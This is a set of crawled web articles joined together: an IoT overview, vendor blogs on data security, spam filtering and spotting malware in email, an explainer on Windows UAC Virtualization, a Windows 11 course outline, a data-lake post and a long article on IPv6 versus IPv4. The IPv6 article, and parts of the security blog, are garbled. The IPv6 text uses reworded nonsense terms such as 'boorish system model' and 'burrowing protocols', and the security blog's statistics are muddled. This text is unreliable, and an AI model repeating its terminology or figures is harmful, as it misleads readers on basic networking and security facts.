trying to get the diagnosis data). This leads to a need to develop the training data set locally (at one specific hospital) over time, which can take long periods of time (think years) to develop something statistically significant. Sadly, machine learning cannot solve every problem. It suffers from a lack of creativity. If you want to invent something new, create new art, record new music, etc., machine learning cannot help. It relies on the existence of historical data (read a lot of historical data), and so expressive tasks aren’t really a good fit. As my dad always said, don’t use a wrench to bang in a nail.
<urn:uuid:596cbbbb-d523-4091-89d0-79ea7c6b5184>
CC-MAIN-2022-40
https://www.celonis.com/blog/whats-next-for-ai/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337504.21/warc/CC-MAIN-20221004121345-20221004151345-00068.warc.gz
en
0.948052
806
2.890625
3
How the Internet of Things (IoT) is driving the future ‘The Connected Life’ The IoT trend is growing and it represents a transformative shift for the economy. It opens opportunities for businesses of all sizes and across a variety of sectors to interact with consumers in new and exciting ways to optimize their strategies. The connected devices use the real advantages in cloud computing in terms of quality, reliability, longevity and resource optimization. It is estimated that by 2020 around 50 billion devices around the globe will be connected to the Internet, feeding petabytes of data to the cloud. With rising number of devices getting connected and interacting with each other, more data can be captured and analyzed which in turn increases the potential for unlocking innovations and improving operations. By leveraging cloud technology and big data techniques, manufacturers analyzes the data and understand how appliances are used by consumers. Using a software or tool the data can then be analyzed and turned into business insight. IoT is emerging as the third wave in the development of the internet. Internet wave in 1990’s has connected one billion users while the mobile wave in 2000’s connected another two billion. The IoT has the potential to connect millions of “things” to the internet. IoT functions on more advanced techniques and differs from Internet in following ways - It leverages sensors attached to the things (temperature, pressure etc). More data is generated by things with sensors than by people. It adds intelligence to manual processes (eg. Reduce power usage on hot days). Not only to people IoT extends the Internet’s productivity gains to things. It connects objects to the network. Some of the intelligence shifts from cloud to the network edge’s. It customizes technology and process to specific verticals (e.g home automation, healthcare, retail etc). Unlike PC’s and smartphones, IoT is fragmented. Deploys pervasively (human bodies, cars, homes, cities etc). Connected with the number of devices anywhere it provides a high magnitude of security. IoT Use Cases/Applications IoT devices are all around us. The cloud is what that connects anything-anytime-anyone. It’s seeping into everyday life with home and industrial building automation, traffic management automation, remote security and control, smart applications including cities, water, building, agriculture, grids, meters, cars, animal farming and environment. Below are the most common use cases for the IoT. - A refrigerator can identify the food items and can get your shopping list while you are out. - Shirts can pick a tie for you. - Motorized drifters can track and monitor water activities - The Noise level of a particular area can be monitored. - Drivers can remotely monitor and control their vehicle. - Vehicle parking space availability can be automatically monitored. - Rubbish in the trash bins can be detected to optimize trash collection routes. Connecting with people and everyday things is not a new phenomenon. Machine-to-Machine communication has been around for many decades; what is new is the way the connected things are becoming an integral part of our lives. The Internet of Things (IoT) is getting an increasing amount of consideration providing significant benefits to human safety, to our health and the environment. There is nothing new about the idea; everybody knew it was "the future." But that future is here. Effective remote conventions, sensors to sense everything, and fewer expensive processors are devising the future now.
<urn:uuid:35eceb4a-a709-40cc-942e-ee50f63eb76e>
CC-MAIN-2022-40
https://www.greycampus.com/blog/it-service-management/how-the-internet-of-things-iot-is-driving-the-future
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334515.14/warc/CC-MAIN-20220925070216-20220925100216-00268.warc.gz
en
0.914266
755
2.890625
3
Security: Is it Mission Impossible? Importance of Data Privacy What is the importance of Data Privacy, and why is it essential? This is something that companies need to ask themselves when they are setting things up in their initial phases. Data Privacy is one of the preventive measures which would be instrumental in protecting the data and stopping any corruption through the development lifecycle. Many data security solutions are now present in the market, and these solutions mainly include some of the features that are a mandate. These include, - Tokenization – This is essentially a substitution of data elements with an equivalent known as the token. Therefore, the token can be generally referenced, which are then mapped to the sensitive data. - Data encryption – This is a security measure where the data would be encoded and can only be decoded when a correct security key would be entered. - Key Management – This includes the management of coded keys inside the cryptosystem. This would also include managing the exchange, storage, creation, and key replacement activities as well. Data is something that can make or break a company permanently. It is, therefore, very essential to have mechanisms that would safeguard it against any cyber-attackers. Some of the popular solutions like Cisco Security Solutions are now providing additional security levels and functionalities to organizations. It is, therefore, imperative to have these measures in place, and this is where we understand the importance of data security in our personal as well as in our corporate lives. Should we have Data Security Solutions in Place? We have had quite a series of data security issues and the numbers and the number of losses that have been incurred over the years are quite astounding. Let us have a look at some of the statistics which would essentially want you to have a look at your existing data security measures in place, - As per official reports by Verizon, there are over 94% of malware that are sent via email, and about 34% of data breaches usually occurred because of internal personnel. - Symantec thinks that there has been a considerable amount of phishing emails. The numbers usually ranged from 1 in 2995 in 2017, and now it has come down to 1 in 3207. Also, there has been a considerable increase in Malicious PowerShell scripts on security endpoints by over 1000%. - There are over 100,000 groups in over 150 countries, and close to 400,000 machines were infected because of a virus outbreak of Wannacry in 2017. These cost companies over $4 billion. - Cryptomining is another source of data attack where over 90% of remote code execution attacks take place. Some of these attacks are dangerous, and therefore it is essential to have data security solutions in place for any variants of attacks. Companies are mainly focused on protecting the three vital spheres of the process, these include, Then again, these three processes protect some of the inherent processes of the company. These would include the intellectual capital, infrastructure that is important for the organization processes, information of the customers, value of the brand, and so much more. Therefore, it is important to understand that data security and its solutions are not just important for companies but also in our homes as well. We cannot have data attacks on our home computers, resulting in cyber-attackers taking away all our data through these unscrupulous measures. There have been reports nowadays that organizations and businesses also get attacked since they have a lot of security backdoors. This ensures that attackers can sneak in and take away the data resources that would eventually cause system breakdowns. Therefore, data security solutions would provide you with the vital shielding necessary to prevent any backdoor attacks. These solutions will have IPSec protocols, email security measures, malware attack deterrents other things in place. This should give companies enough evidence to prevent any of these attacks in the future. About Computer Solutions East Computer Solutions East is an official partner of Cisco solutions, and they provide all kinds of expert opinions concerning the products that they have. CSE understands now that most of the footprint and the landscape are now shifting towards mobile and business applications, which is important for companies in the long run. CSE also provides great collaboration capabilities concerning Cisco Solutions and if clients any support. The efficiency in which the data security services are provided is top-notch, and the security is much more advanced in this approach. Computer Solutions East can essentially tell you that securing your organization’s data is important, and nothing is impossible if the approach and the outlook are correct. The Company mainly lets its clients do business in a way that would be beneficial.
<urn:uuid:22d05856-fb9e-4d58-aea5-d41fa8a7e864>
CC-MAIN-2022-40
https://www.computersolutionseast.com/blog/cybersecurity-trends/security-is-it-mission-impossible/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334912.28/warc/CC-MAIN-20220926144455-20220926174455-00268.warc.gz
en
0.96451
948
2.53125
3
How Spam Filtering Techniques Are Adopting The Latest Technologies Such As Machine Learning Inception and advancements of technology come with many risks of online threats. Many threats became obsolete, but spam is one threat that doesn’t seem to be going away any time soon. Spam emails are not always about peculiar ads; instead, they can also be emails containing malicious attachments, targeting your organization’s network. For instance, spam can infect your system with ransomware, causing severe consequences as threat actors lock your data and demand ransom in return to unlock it. All these make implementing proper techniques of spam filtering essential in today’s times. What Is A Spam Filter And How Does It Work? A spam filter is a program developed to spot unwanted, suspicious email messages. Thus, it prevents such unsolicited messages from reaching a user’s email inbox. What do spam filters look for are specific spammy criteria that it can impose on incoming emails. As a result, it generates a score based on which an email will be considered legit or spam. When it comes to the best free spam filters to secure the systems, various options are available in the market. Using Machine Learning for Email Spam filtering The machine learning technique uses statistical methods for automatic email classification to filter spam from a user’s inbox. Some popular Machine Learning techniques for spam filtering are Naive Bayes, Support Vector Machines, Decision Trees, Neural Networks, etc. The sophistication of Machine learning algorithms makes it one of the best spam filter services among all other spam filtering techniques. The success of spam filter Gmail can be ascribed to Gmail’s timely transition and successful use of the Machine Learning techniques to filter both, incoming spam and other abuses like Denial-of-Service (DoS) attacks. The reason for the success of Machine Learning based spam filters is that they retrain themselves when put in use and minimize the manual effort required while delivering superior filtering accuracy. Which Are Other Popular Spam Filtering Techniques? - Honey pots: A honeypot is a decoy system or server set up to gather information about hackers or collect spam. It offers content-based spam filtering by using a fingerprint-based technique. They help security professionals to learn about the latest techniques used by hackers. - Signature Schemes: These schemes are used by most antivirus products, which work on the basis of signatures. The MTAs store the hashes of spam messages identified previously and check all the incoming mails against these signatures. Since signatures match the patterns exactly, these spam filtering solutions can detect known intrusions easily. - Collaborative Spam Filtering: It is a distributed approach to filter spam. A whole community works with a piece of shared information about spam and develops techniques to filter out the same. This article saw how Machine Learning and other Spam filtering techniques are extremely beneficial to stay safe from unsolicited emails. However, a single technique cannot provide 100% protection against spam. Hence, an organization needs to search for a solution with multiple spam-filtering techniques to better deal with junk emails. However, staff training is also necessary to combat this situation and streamline the spam filtering process. Join the thousands of organizations that use DuoCircle Find out how affordable it is for your organization today and be pleasantly surprised.
<urn:uuid:0e3445f5-f74c-425c-8a15-77b7d4410c07>
CC-MAIN-2022-40
https://www.duocircle.com/content/spam-filter/spam-filtering-techniques
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334912.28/warc/CC-MAIN-20220926144455-20220926174455-00268.warc.gz
en
0.911475
676
2.71875
3
Cybercrime keeps developing as IT securities keep advancing. By utilizing cutting-edge tools and strategies to breach or corrupt systems, cybercriminals always try to outpace the development of IT security measures. Numerous breaches have occurred, exposing millions of client details, even at well-known companies like Equifax and Adobe Particularly for businesses, Email is a vital medium for communication. But, unfortunately, Email is also the primary delivery method for threats and online criminal activity. Can you now envision the potential consequences of clicking on a direct, risky link or attachment? The possibility of enormous financial and intellectual losses due to an incursion or data breach is not overstated. Users must thus use caution when engaging with these emails. Users should be able to discern between innocent emails and those that contain Malware, to be more specific. What is A Malware The virus, which first appeared in 2007, is virtually old-fashioned in the new service-led ransomware environment. But, according to the examination of a sample that DFIR researchers discovered in October, Malware is still quick and effective The word “malware” refers to a broad range of harmful software, including viruses, spyware, adware, browser hijacking programs, and phony security software. Malware may be created to spy on you or steal your personal information, damage your software, or even extort money from users whose machines it infects. Malware may disguise itself as a regular file or be hidden within one, making it difficult to detect; regrettably, this makes it a common tool for fraud and scams. Although many malware versions have diverse ways of infecting systems and propagating, 94% of Malware is sent via Email. Types of Malware All Malware can be exploited to steal data, passwords, personal or financial information, or business secrets. How they are propagated or constructed frequently distinguishes them. We’ll look at the six most prevalent kinds of Malware to help you better grasp the malware environment. Malware programs that encrypt and hold captive your data are referred to as ransomware. In most cases, the ransom won’t be paid until the ransom has been delivered (typically in cryptocurrency). In addition to crippling businesses, ransomware attacks have had catastrophic effects on hospitals, police forces, and even local governments. Spyware keeps track of everything that happens on a particular machine. For instance, some spyware enables attackers to record keystrokes, which allows them to obtain critical information like passwords. Trojan horses frequently pose as trustworthy applications, such as MP3 downloads, while secretly harboring dangerous code. The malicious payload of the trojan cannot be launched unless the end user opens it. Visiting a compromised website and opening a malicious email are common ways for users to acquire trojans. Adware frequently gathers information from your computer to show you trustworthy or harmful adverts. For instance, a malicious adware application could modify your browser’s home page or impede system performance. A computer virus alters host files, so malicious code runs when the victim launches the infected files. It might be challenging to remove viruses because they influence other files. In the late 1990s, worms became famous. A worm will frequently appear as a mail attachment that, when opened, may infect an entire business. Worms are known for their ability to reproduce on their own. 7 Tips to Identify Malware in Emails Users like you can determine if an email is dangerous, malware-infected, or authentic by keeping an eye out for various indicators and symptoms. A few of them are: 1. Strange Email Address To put it another way, only open emails from individuals you know. Never open unwanted mail. Since unsolicited or unwelcome emails are not to be trusted, just as we do not trust strangers in the real world. Typically, they may have malware infestations or might be deceptive 2. Mischievous Attachments These are most likely the ones that the hacker community focuses on since they can be used to spread Malware. The virus damages your systems when you open or downloads a malicious attachment. Therefore, avoid opening attachments that seem suspicious since they can contain Malware. 3. Thrilling Subject Lines Evil intentions are hidden in emails with exciting subject lines like “You’ve Won A Free Trip To Europe” or “Lose 100 Kilos In 3 Days.” They could either have Malware on them or want to steal your data. To avoid receiving emails with malware-infected subject lines, the first step is to avoid receiving emails with such exciting subject lines. 4. Danger, Urgency, or Warning Worry or sense of urgency are frequently heightened by malware emails. Be very cautious if an email asks you to open an attachment to remedy an issue. A follow-up request may appear in certain emails that you receive as a second answer. 5. Apprehensive Links Within Emails Next are links that are included in emails. The hacker community frequently embeds links in emails that, when clicked, cause you to download Malware or that drive you to websites trying to steal your private information. As a result, before clicking a link, be sure it is trustworthy. 6. Generic Salutation The Email could contain Malware or be a phishing attempt if it starts with a generic greeting like “Dear Customer.” 7. Absence of Logos Usually written in HTML, valid email messages may contain both text and graphics. Malware emails typically contain a basic layout and very little visual content. Want to Discover More About Malware and How to Avoid It? Are there any malware or prevention issues that this article didn’t cover? If so, contact us at Data First Solutions via call or mail so we can assist and partner with you to fight it.
<urn:uuid:96edbd4a-58a6-4752-8fae-539a91ae7ff3>
CC-MAIN-2022-40
https://dfcanada.com/2022/08/30/signs-malware-in-email/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.31/warc/CC-MAIN-20220927225413-20220928015413-00268.warc.gz
en
0.921811
1,232
2.71875
3
Save to My DOJO So you know what Virtualization is, and you know what UAC is, but what’s UAC Virtualization? User Account Control (UAC) is more than just a Prompt Most Windows users will have seen the User Account Control (UAC) execution prompts, that request the user to confirm if they really want to provide a piece of software with privileged permissions: Microsoft introduced UAC in Windows Vista (and Server 2008) to limit system-level changes to privileged administrative accounts only. Generally speaking, software shouldn’t need write access to system paths during normal operation, so Windows explicitly restricts them to only run in the user context, significantly improving security over prior operating systems like Windows XP. Without authorisation from an administrator, a software call to write to a system path would fail and the program couldn’t execute. If such access is required (such as installing an update) the UAC prompt requests the user to provide consent before system changes can be made. This was a great innovation, from both a security and data management point of view. If the software could write to any location with no authorisation required, it could damage files or data, circumvent the operation of other programs, and install or modify anything it liked, all with no oversight and no way for the user to know that their computer was potentially being taken over and controlled by a rogue application. User data was also potentially scattered all over the place in obscure sub-directories within application paths prior to Microsoft forcibly ending such shoddy data management. UAC breaks Legacy Software, so Microsoft finds a Workaround The change Microsoft made stopped applications from writing to system files and folders unchecked, which included %ProgramFiles%, %Windir%, %Windir%system32, and the registry path HKEY_LOCAL_MACHINESoftware. Programs could make changes to the application path (for installation and updates) after user acknowledgement of a UAC prompt, but user settings and data should be stored within the user profile. Programs aren’t meant to be calling a UAC prompt every time they run (although there are still some terrible examples of this today). Even global settings should be stored in either a shared editable program space (%programdata%) or the appropriate user hive in Windows registry – nothing user-related should ever be written to the application or Windows folder paths. However, Microsoft was aware that what they were doing with Vista was new and relatively sudden – rightly or wrongly, application developers had been writing software for years based on some fairly fundamental assumptions, and UAC was going to break some things – things lots of companies depended on to, well, not be broken. As with most major changes, a certain amount of transition was inevitable. While this new way of limiting how software could alter important system files was an excellent idea, Microsoft now had the problem of supporting legacy applications – software that had been written before the time of enlightenment, in the dark ages when software developers would write user data within the application path (something they should have stopped doing after Windows 2000 introduced the Documents and Settings folder, with user data organised and segmented logically within the one root path). No amount of wishful thinking was going to rewrite the thousands of critical business applications that had been created in the ’90’s, or undo the poor coding practices that persisted right up until Vista’s launch at the end of 2006 (and beyond, in some cases, but let’s not dwell on that). If legacy software would fail to run in this new, strict, UAC controlled environment, and that software was important, users would either run everything with administrative privileges (losing any improvement UAC was bringing to the table – indeed, running everything with admin rights would actually have been a worse situation than we’d had with XP) or disable UAC altogether (an equally bad outcome). Please Welcome to the Stage: UAC Virtualization So Microsoft came up with UAC Virtualization (or UAC Virtualisation, for those of us who speak real English). Because these applications expected to be able to write to a program file path, UAC Virtualization obfuscates the true path to the target folder for the application and presents it with a writable container within the user path (similar to a Symbolic Link or Junction). As far as the application is concerned it has write access to what it needs, but in reality instead of writing to C:Program Files<Application Path>, it’s actually writing to %LOCALAPPDATA%VirtualStore<Application Path> (where Windows makes a copy of all program path files the first time the application tries to write to them). Interestingly, if the program has the ability to open a file browser it can expose to the user, you’ll find that as far as it’s concerned, it still thinks the files it’s working with are exactly where it expects them to be – in the C:Program Files<Application Path> directory tree. But from outside the application, you can see that it’s actually manipulating files within the Virtual Store – nothing you do from within the virtualized program will allow you to see the true path. UAC Virtualization Only Works in Specific Circumstances There are a few caveats to be aware of in order to make sure UAC Virtualization works: - Limited to 32-bit applications only. AMD64 compatible applications have all been created after these fundamental design decisions were made and by their very nature can’t be written to address system files in ‘the old way’ that UAC Virtualization was created to address. (IA64 applications have their own special set of problems.) - The user must have write access to the files in the original file path. Attempting to write to any files with read-only permissions would bring the whole house of cards crashing down (ie causes the application to crash with an error code). - UAC Virtualization can’t be applied to applications running as administrator or otherwise elevated in any way – it must be running within the standard user context. - UAC Virtualization is disabled by default – it has to be explicitly enabled. Registry Virtualisation is a more specific term for UAC Virtualization applied specifically for registry calls. In that case, registry virtualization fails if an administrator can’t write to the key(s) being called (similar to requirement ‘B’ above). A correct Application Manifest ensures UAC Virtualization isn’t Applied - ‘asInvoker’ (same access token as the parent process, ie the current user context) - ‘highestAvailable’ (highest privileges the current user can obtain) - ‘requireAdministrator’ (can only run as administrator – this is the flag that calls the UAC prompt we all enjoy so much) If none of these are present, Windows will virtualise the application automatically (assuming that behaviour has been enabled). UAC Virtualization silently ensured everything kept working UAC Virtualization was created to allow legacy applications to continue to function in the new UAC world, by having a way to automatically re-route file access requests from the old (incorrect) program path target to the user data path, completely transparent to both the user and the application. Just like all good IT solutions – elegant, completely unseen and almost certainly unknown to the possibly hundreds of thousands of people who would have relied on it every day for some years. Not a Windows 10 Feature! (and don’t rely on it hanging around) Some people have mistakenly thought UAC Virtualization was a Windows 10 feature, but it isn’t. It still exists, in the same way that innumerable legacy features continue to be carried forward and supported for the tiny number of edge cases that still need them. But it was a feature built a decade and a half ago for a problem that in most cases has been long since solved. Microsoft has always stated that it is a temporary, ‘interim application compatibility technology’ that will eventually be removed – it exists for the purpose of allowing non-compliant legacy applications to operate, but only as a stop-gap measure, and developers have been encouraged for many years to transition their programs to a compliant state (ie update or replace it with something that no longer attempts to write to sensitive system areas). So how do You Make it Work? Activation of UAC Virtualization is done within Group Policy. Browse to Computer Configuration, Policies, Windows Settings, Security Settings, Local Policies and Security Options. Scroll right to the bottom of the Security Options Policy window. The last policy is called “User Account Control: Virtualize file and registry write failures to per-user locations”: Select the ‘Define this policy setting’ checkbox and change the radio button to ‘Enabled’: Don’t try this at Home You’ll never need to do this, of course – if you’ve never heard of this feature before now, that’s because you’ve never come across a legacy application that needed it, and that’s extremely unlikely to change in your future career. But it doesn’t hurt to know what it was, and why it was necessary, if for no other reason than to appreciate that words like ‘virtualization’ can mean rather different things in different contexts. That, and how a single seemingly innocuous change in Group Policy can trigger such an elegant and complicated change to the way Windows treats running applications and can intercept and re-route their file calls on the fly under the hood. Makes you wonder what else you didn’t know about those fifty million lines of code… Like App-V, for example. UAC Virtualization was essentially a workaround, to allow legacy programs that expected to store and change user data within the program’s application folder path, to continue to work under new, more secure and better-organised data structures introduced in Windows Vista alongside User Account Control security features. This applied to both files and registry targets and was achieved by dynamically redirecting file access calls from application paths to user data paths in a way that was completely transparent to the software. The term ‘virtualization’ here referred to the folders and data only appearing in the expected location ‘virtually’, when it was actually in a completely different location. Have you had any hands-on experience with UAC Virtualization? Let us know in the comments section below. Not a DOJO Member yet? Join thousands of other IT pros and receive a weekly roundup email with the latest content & updates!
<urn:uuid:146ad5d2-cb8d-4d0a-ae0c-c0173778104c>
CC-MAIN-2022-40
https://www.altaro.com/hyper-v/what-is-uac-virtualization/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.31/warc/CC-MAIN-20220927225413-20220928015413-00268.warc.gz
en
0.937873
2,216
3.171875
3
As an experienced Windows 10 user, when you are ready to move to Windows 11, you might like some guidance in using the new and updated features. This course will help you identify and use those features efficiently and effectively. Who should attend This course is designed for students who have experience using the Windows 10 operating system and need to start using the Windows 11 operating system. To ensure your success in this course you should have experience with using Windows 10. After completing this course, students will be able to: - Navigate the Windows environment. - Use apps available in Windows 11. - Manage available apps. - Configure Windows 11 settings. Outline: Microsoft Windows 11: Transition from Windows 10 (91171) Module 1: Navigating the Windows 11 Environment - Log in to Windows 11 - Use the Start Menu - Use the Taskbar Module 2: Using Apps - Use Built-In Apps - Use the Updated File Explorer Module 3: Managing Apps - Use Virtual Desktops - Obtain Apps from the Microsoft Store Module 4: Configuring Windows 11 Settings - Use the Configuration Apps - Configure Accessibility Features
<urn:uuid:c3b507bb-c70c-45ee-8237-84275400b4e5>
CC-MAIN-2022-40
https://www.fastlanetraining.ca/course/microsoft-91171
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.31/warc/CC-MAIN-20220927225413-20220928015413-00268.warc.gz
en
0.749392
267
2.671875
3
TechTarget has recently published a definition of the term data lake. In the explanation it is mentioned that the term data lake is being accepted as a way to describe any large data pool in which the schema and data requirements are not defined until the data is queried. The explanation also states that: “While a hierarchical data warehouse stores data in files or folders, a data lake uses a flat architecture to store data.” A data lake is an approach to overcome the known big data characteristics being volume, velocity and variety, where probably the former one being variety is the most difficult to overcome with a traditional data warehouse approach. If we look at traditional ways of using data warehouses, this has revolved around storing internal transaction data linked to internal master data. With the raise of big data there will be a swift to encompassing more and more external data. One kind of external data is reference data, being data that typically is born outside a given organization and data that has many different purposes of use. Sharing data with the outside must be a part of your big data approach. This goes for including traditional flavours of big data as social data and sensor data as well what we may call big reference data being pools of global data and bilateral data as explained on this blog on the page called Data Quality 3.0. The data lake approach may very well work for big reference data as it may for other flavours of big data. The BrightTalk community on Big Data and Data Management has a formidable collection of webinars and videos on big data and data management topics. I am looking forward to contribute there on the 25th June 2015 with a webinar about Big Reference Data.
<urn:uuid:225e3778-97d0-4c37-93dd-a68ae3b0fd6b>
CC-MAIN-2022-40
https://liliendahl.com/2015/06/19/using-a-data-lake-for-reference-data/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335491.4/warc/CC-MAIN-20220930145518-20220930175518-00268.warc.gz
en
0.945364
341
2.84375
3
(IPv6) is the most recent rendition of the Internet Protocol (IP), the interchanges protocol that gives an ID and area framework for machines on systems and courses movement over the Internet. IPv6 was created by the Internet Engineering Task Force (IETF) to manage the since a long time ago foreseen issue of IPv4 address fatigue. IPv6 is proposed to supplant IPv4, which still conveys more than 96% of Internet activity worldwide as of May 2014.As of June 2014, the rate of clients arriving at Google administrations with IPv6 surpassed 4% for the first time. Each gadget on the Internet is relegated an IP address for recognizable proof and area definition. With the fast development of the Internet after commercialization in the 1990s, it got to be obvious that significantly a bigger number of addresses than the IPv4 address space has accessible were important to interface new gadgets later on. By 1998, the Internet Engineering Task Force (IETF) had formalized the successor protocol. IPv6 utilizes a 128-bit address, permitting 2128, or pretty nearly 3.4x1038 address, or more than 7.9x1028 times the same number of as IPv4, which utilizes 32-bit addresses and gives roughly 4.3 billion addresses. The two protocols are not intended to be interoperable, entangling the move to IPv6. In any case, a few IPv6 move components have been concocted to allow correspondence in the middle of IPv4 and IPv6 has. IPv6 gives other specialized profits notwithstanding a bigger tending to space. Specifically, it allows progressive address distribution systems that encourage course total over the Internet and along these lines restrain the extension of routing tables. The utilization of multicast and its purpose is stretched and improved, and gives extra streamlining to the conveyance of administrations. Gadget portability, security, and arrangement viewpoints have been considered in the outline of the protocol. IPv6 address are spoken to as eight gatherings of four hexadecimal digits differentiated by colons, for instance 2001:0db8:85a3:0042:1000:8a2e:0370:7334, yet strategies for shortening of this full documentation exist.IPv6 is an Internet Layer protocol for parcel exchanged internetworking and gives end-to-end datagram transmission crosswise over various IP systems, nearly sticking to the configuration standards created in the past variant of the protocol, Internet Protocol Version 4 (IPv4). IPv6 was first formally depicted in Internet standard archive RFC 2460, distributed in December 1998. Notwithstanding offering more addresses, IPv6 likewise executes offers not show in IPv4. It disentangles parts of address task (stateless address auto configuration), system renumbering and switch proclamations when changing system integration suppliers. It disentangles handling of bundles by switches by setting the requirement for parcel fracture into the end focuses. The IPv6 subnet size is institutionalized by altering the measure of the host identifier share of an address to 64 bits to encourage a programmed system for structuring the host identifier from connection layer tending to data (MAC address). System security was a configuration necessity of the IPv6 construction modeling, and incorporated the first determination of Ipsec. IPv6 does not indicate interoperability characteristics with IPv4, yet basically makes a parallel, autonomous system. Trading activity between the two systems obliges interpreter doors utilizing one of a few move instruments, for example, Nat64, the burrowing protocols 6to4, 6in4, Teredo. (IPv4) was the first openly utilized variant of the Internet Protocol. IPv4 was produced as an examination extends by the Defense Advanced Research Projects Agency (DARPA), a United States Department of Defense organization, before turning into the establishment for the Internet and the World Wide Web. IPv4 incorporated a tending to framework that utilized numerical identifiers comprising of 32 bits. These addresses are regularly shown in quad-specked documentation as decimal estimations of four octets, each in the extent 0 to 255, or 8 bits for every number. Hence, IPv4 gives a tending to capacity of 232 or more or less 4.3 billion addresses. Address weariness was not at first a worry in IPv4 as this form was initially attempted to be a test of DARPA's organizing concepts. During the first decade of operation of the Internet, by the late 1980s, it got to be evident that strategies must be produced to preserve address space. In the early 1990s, much after the overhaul of the tending to framework utilizing a boorish system model, it got to be clear that this would not suffice to anticipate IPv4 address depletion, and that further changes to the Internet base were needed. The last unassigned top-level address squares of 16 million IPv4 address was apportioned in February 2011 by the Internet Assigned Numbers Authority (IANA) to the five territorial Internet registries (Rids). On the other hand, every RIR still has accessible address pools and is required to proceed with standard address assignment approaches until one/8 Classless Inter-Domain Routing (CIDR) piece remains. After that, just squares of 1024 address (/22) will be given from the RIRS to a neighborhood Internet registry (LIR). As of September 2012, both the Asia-Pacific Network Information Center (APNIC) and the Reseaux IP Europeens Network Coordination Center (Ripe_ncc) have arrived at this stage On the Internet, information is transmitted as system bundles. IPv6 tags another bundle organization, intended to minimize parcel header handling by routers. Because the headers of IPv4 parcels and IPv6 bundles are fundamentally distinctive, the two protocols are not interoperable. Nonetheless, in many regards, IPv6 is a preservationist expansion of IPv4. Most transport and application-layer protocols require practically no change to work over IPv6; exemptions are application protocols that insert web layer address, for example, FTP and Ntpv3, where the new address arrangement may cause clashes with existing protocol syntax. The principle point of interest of IPv6 over IPv4 is its bigger address space. The length of an IPv6 address is 128 bits, contrasted and 32 bits in IPv4. The address space in this manner has 2128 or roughly 3.4x1038 address. This would be around 100 address for each molecule on the surface of the earth and very nearly four/64s for every square centimeter of the planet. What's more, the IPv4 address space is inadequately dispensed, with roughly 14% of all accessible address utilized. While these numbers are extensive, it was not the goal of the architects of the IPv6 address space to guarantee topographical immersion with usable address. Rather, the more drawn out address improve portion of address, empower proficient course total, and permit execution of uncommon tending to peculiarities. In IPv4, complex Classless Inter-Domain Routing (CIDR) strategies were created to make the best utilization of the little address space. The standard size of a subnet in IPv6 is 264 addresses, the square of the extent of the whole IPv4 address space. Along these lines, genuine address space usage rates will be little in IPv6, yet organize administration and routing productivity is enhanced by the substantial subnet space and progressive course conglomeration. Renumbering a current system for another integration supplier with distinctive routing prefixes is a real exertion with IPv4. With IPv6, on the other hand, changing the prefix published by a couple of switches can on a fundamental level renumber a whole system, since the host identifiers (the slightest noteworthy 64 bits of an address) might be freely self-designed by a host. Multicasting, the transmission of a parcel to different ends of the line in a solitary send operation, is a piece of the base determination in IPv6. In IPv4 this is a nonobligatory in spite of the fact that normally actualized feature. IPv6 multicast tending to imparts regular peculiarities and protocols to IPv4 multicast, additionally gives changes and enhancements by disposing of the requirement for specific protocols. IPv6 does not execute protocol IP show, i.e. the transmission of a bundle to all hosts on the connected connection utilizing an uncommon telecast address, and hence does not characterize show addresses. In IPv6, the same result might be accomplished by sending a bundle to the connection nearby all hubs multicast bunch at address ff02::1, which is similar to IPv4 multicast to address 18.104.22.168. IPv6 additionally accommodates new multicast executions, including implanting meeting point addresses in an IPv6 multicast gathering address, which streamlines the organization of between area solutions. In IPv4 it is exceptionally troublesome for an association to get even one comprehensively routable multicast bunch task, and the usage of between area results is arcane. Unicast address assignments by a nearby Internet registry for IPv6 have at any rate a 64-bit routing prefix, yielding the most diminutive subnet size accessible in IPv6 (additionally 64 bits). With such a task it is conceivable to install the unicast address prefix into the IPv6 multicast address arrangement, while as of now giving a 32-bit obstruct, the slightest critical bits of the address, or more or less 4.2 billion multicast bunch identifiers. Accordingly every client of an IPv6 subnet naturally has accessible a set of all around routable source-particular multicast bunches for multicast applications. IPv6 hosts can design themselves consequently when associated with an IPv6 system utilizing the Neighbor Discovery Protocol by means of Internet Control Message Protocol form 6 (Icmpv6) switch disclosure messages. At the point when initially joined with a system, a host sends a connection nearby switch sales multicast demand for its design parameters; switches react to such an appeal with a switch notice bundle that contains Internet Layer arrangement parameters. In the event that IPv6 stateless address auto configuration is unsatisfactory for an application, a system may utilize setup with the Dynamic Host Configuration Protocol form 6 (Dhcpv6) or hosts may be arranged physically utilizing static techniques. Switches present an extraordinary instance of necessities for address arrangement, as they frequently are wellsprings of auto configuration data, for example, switch and prefix promotions. Stateless arrangement of switches could be attained with a unique switch renumbering protocol. In IPv6, the bundle header and the procedure of parcel sending have been improved. In spite of the fact that IPv6 bundle headers are in any event double the measure of IPv4 parcel headers, bundle preparing by switches is for the most part more efficient, in this manner augmenting the end-to-end standard of Internet outline. Particularly: The parcel header in IPv6 is less difficult than that utilized as a part of IPv4, with a lot of people infrequently utilized fields moved to partitioned discretionary header expansions. IPv6 switches don't perform fracture. IPv6 hosts are obliged to either perform way MTU disclosure, perform end-to-end fracture, or to send bundles no bigger than the IPv6 default MTU size of 1280 octets. The IPv6 header is not secured by a checksum; uprightness insurance is thought to be guaranteed by both connection layer and higher-layer (TCP, UDP, and so forth.) blunder identification. UDP/IPv4 might really have a checksum of 0, demonstrating no checksum; IPv6 obliges UDP to have it checksum. Subsequently, IPv6 switches don't have to recompute a checksum when header fields, (for example, the time to live (TTL) or bounce check) change. This change may have been made less essential by the improvement of switches that perform checksum calculation at connection pace utilizing devoted fittings, yet it is still important for programming based switches. The TTL field of IPv4 has been renamed to Hop Limit in IPv6, reflecting the way that switches are no more anticipated that will figure the time a parcel has used in a queue. The IPv6 bundle header has a settled size (40 octets). Alternatives are actualized as extra expansion headers after the IPv6 header, which restrains their size just by the extent of a whole bundle. The expansion header system makes the protocol extensible in that it permits future administrations for nature of administration, security, versatility, and others to be included without upgrade of the essential protocol. Without internet protocols, 